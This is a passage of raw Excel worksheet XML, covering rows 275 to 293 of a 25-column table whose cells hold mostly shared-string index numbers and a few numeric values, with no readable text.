      <c r="F275" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G275" s="12" t="s">
        <v>2386</v>
      </c>
      <c r="H275" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I275" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J275" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K275" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L275" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M275" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N275" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O275" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P275" s="12" t="s">
        <v>2387</v>
      </c>
      <c r="Q275" s="12">
        <v>2.4</v>
      </c>
      <c r="R275" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S275" s="12" t="s">
        <v>2388</v>
      </c>
      <c r="T275" s="12" t="s">
        <v>2389</v>
      </c>
      <c r="U275" s="12" t="s">
        <v>2390</v>
      </c>
      <c r="V275" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W275" s="12">
        <v>793</v>
      </c>
      <c r="X275" s="12">
        <v>57</v>
      </c>
      <c r="Y275" s="12" t="s">
        <v>2392</v>
      </c>
    </row>
    <row r="276" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A276" s="12">
        <v>1039</v>
      </c>
      <c r="B276" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D276" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F276" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G276" s="12" t="s">
        <v>2393</v>
      </c>
      <c r="H276" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I276" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J276" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K276" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L276" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M276" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N276" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O276" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P276" s="12" t="s">
        <v>2394</v>
      </c>
      <c r="Q276" s="12">
        <v>2.6</v>
      </c>
      <c r="R276" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S276" s="12" t="s">
        <v>2395</v>
      </c>
      <c r="T276" s="12" t="s">
        <v>2396</v>
      </c>
      <c r="U276" s="12" t="s">
        <v>2397</v>
      </c>
      <c r="V276" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W276" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X276" s="12">
        <v>7</v>
      </c>
      <c r="Y276" s="12" t="s">
        <v>2399</v>
      </c>
    </row>
    <row r="277" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A277" s="12">
        <v>1044</v>
      </c>
      <c r="B277" s="12" t="s">
        <v>28577</v>
      </c>
      <c r="D277" s="12" t="s">
        <v>28578</v>
      </c>
      <c r="E277" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F277" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G277" s="12" t="s">
        <v>2407</v>
      </c>
      <c r="H277" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I277" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J277" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K277" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L277" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M277" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N277" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O277" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P277" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q277" s="12">
        <v>2.6</v>
      </c>
      <c r="R277" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S277" s="12" t="s">
        <v>2408</v>
      </c>
      <c r="T277" s="12" t="s">
        <v>2409</v>
      </c>
      <c r="U277" s="12" t="s">
        <v>2410</v>
      </c>
      <c r="V277" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W277" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X277" s="12">
        <v>10</v>
      </c>
      <c r="Y277" s="12" t="s">
        <v>2411</v>
      </c>
    </row>
    <row r="278" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A278" s="12">
        <v>1045</v>
      </c>
      <c r="B278" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D278" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E278" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F278" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G278" s="12" t="s">
        <v>2412</v>
      </c>
      <c r="H278" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I278" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J278" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K278" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L278" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M278" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N278" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O278" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P278" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q278" s="12">
        <v>2.6</v>
      </c>
      <c r="R278" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S278" s="12" t="s">
        <v>2413</v>
      </c>
      <c r="T278" s="12" t="s">
        <v>2409</v>
      </c>
      <c r="U278" s="12" t="s">
        <v>2414</v>
      </c>
      <c r="V278" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W278" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X278" s="12">
        <v>13</v>
      </c>
      <c r="Y278" s="12" t="s">
        <v>2415</v>
      </c>
    </row>
    <row r="279" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A279" s="12">
        <v>1057</v>
      </c>
      <c r="B279" s="12" t="s">
        <v>28579</v>
      </c>
      <c r="C279" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D279" s="12" t="s">
        <v>28580</v>
      </c>
      <c r="E279" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F279" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G279" s="12" t="s">
        <v>2422</v>
      </c>
      <c r="H279" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I279" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J279" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K279" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L279" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M279" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N279" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O279" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P279" s="12" t="s">
        <v>2368</v>
      </c>
      <c r="Q279" s="12">
        <v>2.6</v>
      </c>
      <c r="R279" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S279" s="12" t="s">
        <v>2423</v>
      </c>
      <c r="T279" s="12" t="s">
        <v>1591</v>
      </c>
      <c r="U279" s="12" t="s">
        <v>2424</v>
      </c>
      <c r="V279" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W279" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X279" s="12">
        <v>5</v>
      </c>
      <c r="Y279" s="12" t="s">
        <v>2425</v>
      </c>
    </row>
    <row r="280" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A280" s="12">
        <v>1058</v>
      </c>
      <c r="B280" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C280" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D280" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E280" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F280" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G280" s="12" t="s">
        <v>2426</v>
      </c>
      <c r="H280" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I280" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J280" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K280" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L280" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M280" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N280" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O280" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P280" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q280" s="12">
        <v>2.6</v>
      </c>
      <c r="R280" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S280" s="12" t="s">
        <v>2427</v>
      </c>
      <c r="T280" s="12" t="s">
        <v>2428</v>
      </c>
      <c r="U280" s="12" t="s">
        <v>2429</v>
      </c>
      <c r="V280" s="12" t="s">
        <v>2430</v>
      </c>
      <c r="W280" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X280" s="12">
        <v>9</v>
      </c>
      <c r="Y280" s="12" t="s">
        <v>2431</v>
      </c>
    </row>
    <row r="281" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A281" s="12">
        <v>1061</v>
      </c>
      <c r="B281" s="12" t="s">
        <v>28588</v>
      </c>
      <c r="C281" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D281" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E281" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F281" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G281" s="12" t="s">
        <v>2433</v>
      </c>
      <c r="H281" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I281" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J281" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K281" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L281" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M281" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N281" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O281" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P281" s="12" t="s">
        <v>2368</v>
      </c>
      <c r="Q281" s="12">
        <v>2.6</v>
      </c>
      <c r="R281" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S281" s="12" t="s">
        <v>2434</v>
      </c>
      <c r="T281" s="12" t="s">
        <v>2230</v>
      </c>
      <c r="U281" s="12" t="s">
        <v>2435</v>
      </c>
      <c r="V281" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W281" s="12">
        <v>1004</v>
      </c>
      <c r="X281" s="12">
        <v>12</v>
      </c>
      <c r="Y281" s="12" t="s">
        <v>2436</v>
      </c>
    </row>
    <row r="282" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A282" s="12">
        <v>1062</v>
      </c>
      <c r="B282" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D282" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E282" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F282" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G282" s="12" t="s">
        <v>2437</v>
      </c>
      <c r="H282" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I282" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J282" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K282" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L282" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M282" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N282" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O282" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P282" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q282" s="12">
        <v>2.6</v>
      </c>
      <c r="R282" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S282" s="12" t="s">
        <v>2438</v>
      </c>
      <c r="T282" s="12" t="s">
        <v>622</v>
      </c>
      <c r="U282" s="12" t="s">
        <v>2439</v>
      </c>
      <c r="V282" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W282" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X282" s="12">
        <v>2</v>
      </c>
      <c r="Y282" s="12" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="283" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A283" s="12">
        <v>1063</v>
      </c>
      <c r="B283" s="12" t="s">
        <v>28589</v>
      </c>
      <c r="D283" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F283" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G283" s="12" t="s">
        <v>2441</v>
      </c>
      <c r="H283" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I283" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J283" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K283" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L283" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M283" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N283" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O283" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P283" s="12" t="s">
        <v>2421</v>
      </c>
      <c r="Q283" s="12">
        <v>2.6</v>
      </c>
      <c r="R283" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S283" s="12" t="s">
        <v>2442</v>
      </c>
      <c r="T283" s="12" t="s">
        <v>2443</v>
      </c>
      <c r="U283" s="12" t="s">
        <v>2444</v>
      </c>
      <c r="V283" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W283" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X283" s="12">
        <v>2</v>
      </c>
      <c r="Y283" s="12" t="s">
        <v>2445</v>
      </c>
    </row>
    <row r="284" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A284" s="12">
        <v>1065</v>
      </c>
      <c r="B284" s="12" t="s">
        <v>28590</v>
      </c>
      <c r="D284" s="12" t="s">
        <v>28591</v>
      </c>
      <c r="F284" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G284" s="12" t="s">
        <v>2446</v>
      </c>
      <c r="H284" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I284" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J284" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K284" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L284" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M284" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N284" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O284" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P284" s="12" t="s">
        <v>2421</v>
      </c>
      <c r="Q284" s="12">
        <v>2.6</v>
      </c>
      <c r="R284" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S284" s="12" t="s">
        <v>2447</v>
      </c>
      <c r="T284" s="12" t="s">
        <v>1745</v>
      </c>
      <c r="U284" s="12" t="s">
        <v>2448</v>
      </c>
      <c r="V284" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W284" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X284" s="12">
        <v>7</v>
      </c>
      <c r="Y284" s="12" t="s">
        <v>2449</v>
      </c>
    </row>
    <row r="285" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A285" s="12">
        <v>1070</v>
      </c>
      <c r="B285" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C285" s="12" t="s">
        <v>28592</v>
      </c>
      <c r="D285" s="12" t="s">
        <v>28593</v>
      </c>
      <c r="F285" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G285" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="H285" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I285" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J285" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K285" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L285" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M285" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N285" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O285" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P285" s="12" t="s">
        <v>2421</v>
      </c>
      <c r="Q285" s="12">
        <v>2.6</v>
      </c>
      <c r="R285" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S285" s="12" t="s">
        <v>2456</v>
      </c>
      <c r="T285" s="12" t="s">
        <v>2457</v>
      </c>
      <c r="U285" s="12" t="s">
        <v>2458</v>
      </c>
      <c r="V285" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W285" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X285" s="12">
        <v>3</v>
      </c>
      <c r="Y285" s="12" t="s">
        <v>2459</v>
      </c>
    </row>
    <row r="286" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A286" s="12">
        <v>1072</v>
      </c>
      <c r="B286" s="12" t="s">
        <v>30449</v>
      </c>
      <c r="D286" s="12" t="s">
        <v>28594</v>
      </c>
      <c r="F286" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G286" s="12" t="s">
        <v>2460</v>
      </c>
      <c r="H286" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I286" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J286" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K286" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L286" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M286" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N286" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O286" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P286" s="12" t="s">
        <v>2421</v>
      </c>
      <c r="Q286" s="12">
        <v>2.6</v>
      </c>
      <c r="R286" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S286" s="12" t="s">
        <v>2461</v>
      </c>
      <c r="T286" s="12" t="s">
        <v>2462</v>
      </c>
      <c r="U286" s="12" t="s">
        <v>2463</v>
      </c>
      <c r="V286" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W286" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X286" s="12">
        <v>6</v>
      </c>
      <c r="Y286" s="12" t="s">
        <v>2464</v>
      </c>
    </row>
    <row r="287" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A287" s="12">
        <v>1074</v>
      </c>
      <c r="B287" s="12" t="s">
        <v>28595</v>
      </c>
      <c r="C287" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D287" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F287" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G287" s="12" t="s">
        <v>2465</v>
      </c>
      <c r="H287" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I287" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J287" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K287" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L287" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M287" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N287" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O287" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P287" s="12" t="s">
        <v>2421</v>
      </c>
      <c r="Q287" s="12">
        <v>2.6</v>
      </c>
      <c r="R287" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S287" s="12" t="s">
        <v>2466</v>
      </c>
      <c r="T287" s="12" t="s">
        <v>2467</v>
      </c>
      <c r="U287" s="12" t="s">
        <v>2468</v>
      </c>
      <c r="V287" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W287" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X287" s="12">
        <v>3</v>
      </c>
      <c r="Y287" s="12" t="s">
        <v>2469</v>
      </c>
    </row>
    <row r="288" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A288" s="12">
        <v>1082</v>
      </c>
      <c r="B288" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D288" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F288" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G288" s="12" t="s">
        <v>2477</v>
      </c>
      <c r="H288" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I288" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J288" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K288" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L288" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M288" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N288" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O288" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P288" s="12" t="s">
        <v>2478</v>
      </c>
      <c r="Q288" s="12">
        <v>2.6</v>
      </c>
      <c r="R288" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S288" s="12" t="s">
        <v>2479</v>
      </c>
      <c r="T288" s="12" t="s">
        <v>2480</v>
      </c>
      <c r="U288" s="12" t="s">
        <v>2475</v>
      </c>
      <c r="V288" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W288" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X288" s="12">
        <v>2</v>
      </c>
      <c r="Y288" s="12" t="s">
        <v>2481</v>
      </c>
    </row>
    <row r="289" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A289" s="12">
        <v>1084</v>
      </c>
      <c r="B289" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D289" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F289" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G289" s="12" t="s">
        <v>2482</v>
      </c>
      <c r="H289" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I289" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J289" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K289" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L289" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M289" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N289" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O289" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P289" s="12" t="s">
        <v>2421</v>
      </c>
      <c r="Q289" s="12">
        <v>2.6</v>
      </c>
      <c r="R289" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S289" s="12" t="s">
        <v>2483</v>
      </c>
      <c r="T289" s="12" t="s">
        <v>2484</v>
      </c>
      <c r="U289" s="12" t="s">
        <v>2485</v>
      </c>
      <c r="V289" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W289" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X289" s="12">
        <v>5</v>
      </c>
      <c r="Y289" s="12" t="s">
        <v>2486</v>
      </c>
    </row>
    <row r="290" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A290" s="12">
        <v>1085</v>
      </c>
      <c r="B290" s="12" t="s">
        <v>28596</v>
      </c>
      <c r="C290" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D290" s="12" t="s">
        <v>28597</v>
      </c>
      <c r="E290" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F290" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G290" s="12" t="s">
        <v>2487</v>
      </c>
      <c r="H290" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I290" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J290" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K290" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L290" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M290" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N290" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O290" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P290" s="12" t="s">
        <v>2489</v>
      </c>
      <c r="Q290" s="12">
        <v>2.4</v>
      </c>
      <c r="R290" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S290" s="12" t="s">
        <v>2490</v>
      </c>
      <c r="T290" s="12" t="s">
        <v>2491</v>
      </c>
      <c r="U290" s="12" t="s">
        <v>2492</v>
      </c>
      <c r="V290" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W290" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X290" s="12">
        <v>8</v>
      </c>
      <c r="Y290" s="12" t="s">
        <v>2493</v>
      </c>
    </row>
    <row r="291" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A291" s="12">
        <v>1094</v>
      </c>
      <c r="B291" s="12" t="s">
        <v>29796</v>
      </c>
      <c r="C291" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D291" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F291" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G291" s="12" t="s">
        <v>2499</v>
      </c>
      <c r="H291" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I291" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J291" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K291" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L291" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M291" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N291" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O291" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P291" s="12" t="s">
        <v>2500</v>
      </c>
      <c r="Q291" s="12">
        <v>2.6</v>
      </c>
      <c r="R291" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S291" s="12" t="s">
        <v>2501</v>
      </c>
      <c r="T291" s="12" t="s">
        <v>2502</v>
      </c>
      <c r="U291" s="12" t="s">
        <v>612</v>
      </c>
      <c r="V291" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W291" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X291" s="12">
        <v>3</v>
      </c>
      <c r="Y291" s="12" t="s">
        <v>2503</v>
      </c>
    </row>
    <row r="292" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A292" s="12">
        <v>1095</v>
      </c>
      <c r="B292" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C292" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D292" s="12" t="s">
        <v>28598</v>
      </c>
      <c r="F292" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G292" s="12" t="s">
        <v>2504</v>
      </c>
      <c r="H292" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I292" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J292" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K292" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L292" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M292" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N292" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O292" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P292" s="12" t="s">
        <v>2400</v>
      </c>
      <c r="Q292" s="12">
        <v>2.6</v>
      </c>
      <c r="R292" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S292" s="12" t="s">
        <v>2505</v>
      </c>
      <c r="T292" s="12" t="s">
        <v>2506</v>
      </c>
      <c r="U292" s="12" t="s">
        <v>2507</v>
      </c>
      <c r="V292" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W292" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X292" s="12">
        <v>8</v>
      </c>
      <c r="Y292" s="12" t="s">
        <v>2508</v>
      </c>
    </row>
    <row r="293" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A293" s="12">
        <v>1096</v>
      </c>
      <c r="B293" s="12" t="s">
        <v>28599</v>
      </c>
      <c r="D293" s="12" t="s">
        <v>28600</v>
      </c>
      <c r="E293" s="12" t="s">
        <v>31460</v>
      </c>
      <c r="F293" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G293" s="12" t="s">
        <v>2509</v>
      </c>
      <c r="H293" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I293" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J293" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K293" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L293" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M293" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N293" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O293" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P293" s="12" t="s">
        <v>2510</v>
      </c>
      <c r="Q293" s="12">
        <v>2.6</v>
      </c>
      <c r="R293" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S293" s="12" t="s">
        <v>2511</v>
      </c>
      <c r="T293" s="12" t="s">
        <v>2385</v>
      </c>
      <c r="U293" s="12" t="s">
        <v>2512</v>
      </c>
      <c r="V293" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W293" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X293" s="12">
        <v>3</v>
      </c>
      <c r="Y293" s="12" t="s">
        <v>2513</v>
      </c>
    </row>
    <row r="294" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A294" s="12">
        <v>1101</v>
      </c>
      <c r="B294" s="12" t="s">
